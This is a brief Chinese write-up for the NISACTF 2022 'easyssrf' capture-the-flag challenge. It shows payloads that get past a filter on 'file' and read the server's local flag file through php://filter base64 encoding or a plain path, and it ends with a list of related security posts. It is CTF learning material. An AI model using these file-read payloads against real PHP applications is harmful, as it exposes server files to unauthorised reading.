[NISACTF 2022]easyssrf

它提示我们输入 那我们输入file:///flag file:// 访问本地文件系统

它提醒我们输file:///fl4g

它提醒我们输ha1x1ux1u.php

看到代码stristr($file, "file")当我们输入file它会提示我们输了 啥意思可以前面加个/ 也可以通过read读取 思路都是前面加/不等于flag绕过

file=php://filter/read=convert.base64-encode/resource=/flag 这个需要base64解码

file=php://filter/resource=/flag

file=/flag


相关推荐
ALe要立志成为web糕手9 小时前
create_function()漏洞利用
安全·web安全·网络安全·php·rce
半个西瓜.12 小时前
武装Burp Suite工具:xia SQL自动化测试_插件
安全·web安全·网络安全·安全威胁分析
武汉唯众智创18 小时前
2025职业本科网络安全课程体系设计:如何培养行业急需的实战型人才?
安全·web安全·网络安全
Suckerbin19 小时前
Pikachu靶场-SQL注入
数据库·安全·网络安全
bl4ckpe4ch2 天前
【漏洞复现】Struts2系列
网络安全·漏洞复现
Suckerbin2 天前
Pikachu靶场-RCE漏洞
学习·安全·网络安全
学习溢出2 天前
【网络安全】Snort 使用入门:命令详解与实践指南
安全·web安全·网络安全·snort·ids
2501_915909062 天前
如何测试 Flutter 应用? ー 单元测试
websocket·网络协议·tcp/ip·http·网络安全·https·udp
bl4ckpe4ch2 天前
【漏洞复现】CVE-2024-38856(ApacheOfbiz RCE)
网络安全·漏洞复现
游戏开发爱好者82 天前
iOS15描述文件在哪下载?iOS15测试版描述文件下载与升级教程
websocket·网络协议·tcp/ip·http·网络安全·https·udp